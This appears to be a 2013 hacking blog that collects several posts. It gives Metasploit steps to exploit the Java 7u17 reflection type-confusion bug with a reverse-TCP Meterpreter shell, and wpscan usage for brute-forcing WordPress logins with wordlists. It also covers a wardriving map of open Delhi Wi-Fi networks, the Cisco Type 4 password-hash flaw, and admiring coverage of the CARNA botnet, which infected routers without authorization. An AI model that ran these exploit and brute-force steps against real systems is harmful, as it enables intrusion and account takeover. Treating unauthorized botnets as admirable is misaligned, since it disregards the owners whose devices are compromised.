Tuesday, April 30, 2013

Java Applet Reflection Type Confusion Remote Code Execution

Java Applet Reflection Type Confusion Remote Code Execution

This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass.

Exploit Targets

    0 - Generic (Java Payload) (default)
    1 - Windows x86 (Native Payload)
    2 - Mac OS X x86 (Native Payload)
    3 - Linux x86 (Native Payload)


(2)msf > use exploit/multi/browser/java_jre17_reflection_types

(3)msf exploit(java_jre17_reflection_types) > show payloads

(4)msf exploit(java_jre17_reflection_types) > set PAYLOAD java/meterpreter/reverse_tcp

(5)msf exploit(java_jre17_reflection_types) > set LHOST [MY IP ADDRESS]

(6)msf exploit(java_jre17_reflection_types) > exploit

Sunday, April 14, 2013

How to Solve problem of wpscan in Backtrack 5 r3?

Wpscan is wordpress security scanner, which is pre-installed in backtrack 5 , but it`s outdated version, so when you tried to update it, you may  have face some problems. Here is solution which work for me.

cd /pentest/web
rm -rf wpscan
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
gem install bundler && bundle install --without test development
apt-get install libxml2 libxml2-dev libxslt1-dev
gem install  bundler
bundle install
ruby ./wpscan.rb


--update   Update to the latest revision

--url   | -u <target url>  The WordPress URL/domain to scan.

--force | -f Forces WPScan to not check if the remote site is running WordPress.

--enumerate | -e [option(s)]  Enumeration.
  option :
    u        usernames from id 1 to 10
    u[10-20] usernames from id 10 to 20 (you must write [] chars)
    p        plugins
    vp       only vulnerable plugins
    ap       all plugins (can take a long time)
    tt       timthumbs
    t        themes
    vp       only vulnerable themes
    at       all themes (can take a long time)
  Multiple values are allowed : '-e tt,p' will enumerate timthumbs and plugins
  If no option is supplied, the default is 'vt,tt,u,vp'

--exclude-content-based '<regexp or string>'  Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied
                                              You do not need to provide the regexp delimiters, but you must write the quotes (simple or double)

--config-file | -c <config file> Use the specified config file

--follow-redirection  If the target url has a redirection, it will be followed without asking if you wanted to do so or not

--wp-content-dir <wp content dir>  WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it. Subdirectories are allowed

--wp-plugins-dir <wp plugins dir>  Same thing than --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed

--proxy <[protocol://]host:port>  Supply a proxy (will override the one from conf/browser.conf.json).
                                  HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported. If no protocol is given (format host:port), HTTP will be used

--proxy-auth <username:password>  Supply the proxy login credentials (will override the one from conf/browser.conf.json).

--basic-auth <username:password>  Set the HTTP Basic authentication

--wordlist | -w <wordlist>  Supply a wordlist for the password bruter and do the brute.

--threads  | -t <number of threads>  The number of threads to use when multi-threading requests. (will override the value from conf/browser.conf.json)

--username | -U <username>  Only brute force the supplied username.

--help     | -h This help screen.

--verbose  | -v Verbose output.


Do 'non-intrusive' checks...

  ruby wpscan.rb --url www.example.com

Do wordlist password brute force on enumerated users using 50 threads...

  ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50

Do wordlist password brute force on the 'admin' username only...

  ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin

Enumerate installed plugins...

  ruby wpscan.rb --url www.example.com --enumerate p


--help    | -h   This help screen.
--Verbose | -v   Verbose output.
--update  | -u   Update to the latest revision.
--generate_plugin_list [number of pages]  Generate a new data/plugins.txt file. (supply number of *pages* to parse, default : 150)
--gpl  Alias for --generate_plugin_list
--check-local-vulnerable-files | --clvf <local directory>  Perform a recursive scan in the <local directory> to find vulnerable files or shells


- Generate a new 'most popular' plugin list, up to 150 pages ...
ruby wpstools.rb --generate_plugin_list 150

- Locally scan a wordpress installation for vulnerable files or shells :
ruby wpstools.rb --check-local-vulnerable-files /var/www/wordpress/

 If this solution does not work for you then try to upgrade ruby version & then process to installation.

Saturday, April 6, 2013

Virtual Desktop Infrastructure - Introduction

ifcfg-eth0 file configuration

Virtual Desktop Infrastructure is a modern edition of thin client movement used in the 1990s. It involves running desktop operating systems and applications on a virtual machine that resides on a centralized server. These desktops residing on the 
centralized serve could also be called virtual desktops.

Video Tutorial - 

If you want to stay updated on the latest news and links for the VDI, You can like this facebook page and stay updated : https://www.facebook.com/VirtualDesktopIfrastructure

Users who access the virtual desktops from a desktop (PC) or thin client via a remote display protocol get full features as though the applications were resident on their local system(PC) with the only difference being that all applications are in this case centrally managed. This work explains the benefits of Virtual Desktop Infrastructure and the wealth of advantages it has to offer any company that may adopt its use. Some of such advantages include reduction in end user computing cost, simplified client
management, memory, content storage, delivery as well as software maintenance cost/expenses.

Monday, April 1, 2013

Wardriving at Delhi Updated: Access Points with no security

I got an overwhelming response to my Wardriving at Delhi project and have got a lot of emails regarding the same. I am so thrilled that so many people want to contribute to the project. Inspired by your feedback, I am here by producing here an update to my mapping project. This time I went Via Saket to Gurgaon and as usual I got a lot of access points which were OPEN with no security, WEP secured vulnerable access points & WPA/WPA PSK2 secured points.
 Wardriving at Delhi Updated - The OPEN,WEP and WPA
As usual, I used -

The target is to make a map of Delhi with all the access points  to analyse in layman terms -
  1. The security awareness of people and organizations
  2. The devices they are using
  3. The security mechanisms they are using.
  4. Wifi range analysis of individual device.
Well, in all you can find the data from below links -
If you are interested in contributing to the data, please contact me at admintheprohack.com . You can also read how to Hack Wifi using Backtrack , How to detect if someone is using your WiFi  or how to detect WiFi hotspots . If you are having an Android, you can also read about how to use your Android for Wardriving.

Happy Wardriving.

About the author : Rishabh Dangwal

Rishabh Dangwal is a no-nonsense network geek who has got a thing for guitars, 
retro games and emulators. When he is not tinkering with devices and gadgets, 
he can be found reading novels by Fredrick Forsyth. Follow him on Twitter

Cisco Type 4 Passwords cracked–Coding mistake endangers devices

Cisco has issued a security advisory intimating that its new password hashing algorithm TYPE 4 is vulnerable,which allows Cisco TYPE 4 encoded hashes to be cracked easily. TYPE 4 is an update of TYPE 5 , and was supposed to salt passwords and apply 1000 iterations of SHA-256 .  Well, engineers at Cisco actually miscoded the algorithm by forgetting to salt passwords and setting the number of iterations to 1 which makes it even weaker than TYPE 5 algorithm .

“This approach causes a Type 4 password to be less resilient to brute-force attacks than a Type 5 password of equivalent complexity.”

Also, the code base (CISCO IOS 15) also disables TYPE 5 encryption on devices. Well..talk about rubbing salt on wounds.
Cisco Type 4 Passwords cracked–Coding misfire endangers hardware - - TheProhack.com
As per advisory -

"A device running a Cisco IOS or IOS XE release with support for Type 4 passwords lost the capability to create a Type 5 password from a user-provided plaintext password.Backward compatibility problems may arise when downgrading from a device running a Cisco IOS or IOS XE release with Type 4 password support and Type 4 passwords configured to a Cisco IOS or Cisco IOS XE release that does not support Type 4 passwords. Depending on the specific device configuration, the administrator may not be able to log in to the device or to change into privileged EXEC mode, requiring a password recovery process to be performed."
It was meant to be discovered inevitably. Folks at Hashcat - Philipp Schmidt and Jens Steube found it and were able to decode a hash posted at inetpro.org . Since hashes were weak, the information was more than enough to crack millions of hashes in hours if anyone gets their hands on hashes. 
The aftermath ? Cisco says it will be creating new password type to counter it with new as of now unknown commands to implement it.  In the meantime, Cisco says you “may” want to replace Type 4 password with Type 5 , as quoted -
There are two options to generate a Type 5 password:
  • Using another device running a Cisco IOS or Cisco IOS XE release without Type 4 support
  • Using the openssl command-line tool (part of the OpenSSL Project)
You can read the advisory here
You might also want to read  -

CARNA Botnet–Researcher maps Internet using botnet

“ Incredible
thats one word when you describe CARNA botnet, which is a single handed attempt to map the entire Internet by a researcher, which makes it a single most herculean feat I have witnessed in digital domain which both grips me with mixed feelings of  astonishment and Deja Vu.
CARNA Botnet–Researchers map Internet - theprohack.com
As the paper states, the basic theory behind CARNA was

After completing the scan of roughly one hundred thousand IP addresses, we realized the number of insecure devices must be at least one hundred thousand. Starting with one device and assuming a scan speed of ten IP addresses per second, it should find the next open device within one hour. The scan rate would be doubled if we deployed a scanner to the newly found device. After doubling the scan rate in this way about 16.5 times, all unprotected devices would be found; this would take only 16.5 hours. Additionally, with one hundred thousand devices scanning at ten probes per second we would have a distributed port scanner to port scan the entire IPv4 Internet within one hour.
Impressive..  and the payload they devised was small, surgical and targeted routers with insecure logins.

The binary on the router was written in plain C. It was compiled for 9 different architectures using the OpenWRT Buildroot. In its latest and largest version this binary was between 46 and 60 kb in size depending on the target architecture.
Well, the end results ? ~ 420,000 infected routers are identified with 1,300,000,000 geolocated IPV4 devices with about one-third of those responding directly to pings.
Incredible..as I earlier said. Sceptics will say that It can be a hoax, as its difficult to verify with a 586GB bittorrent file compressed with ZPAQ which will decompress to 9TB , it needs somewhat of super human effort to download, unpack and analyze data if it really exists. But again, if its true, Its .. its awesome.
You can
  1. Read the Paper here
  2. Download Bit Torrent file here
  3. See graphical results here
Like I said, prepare to be amazed.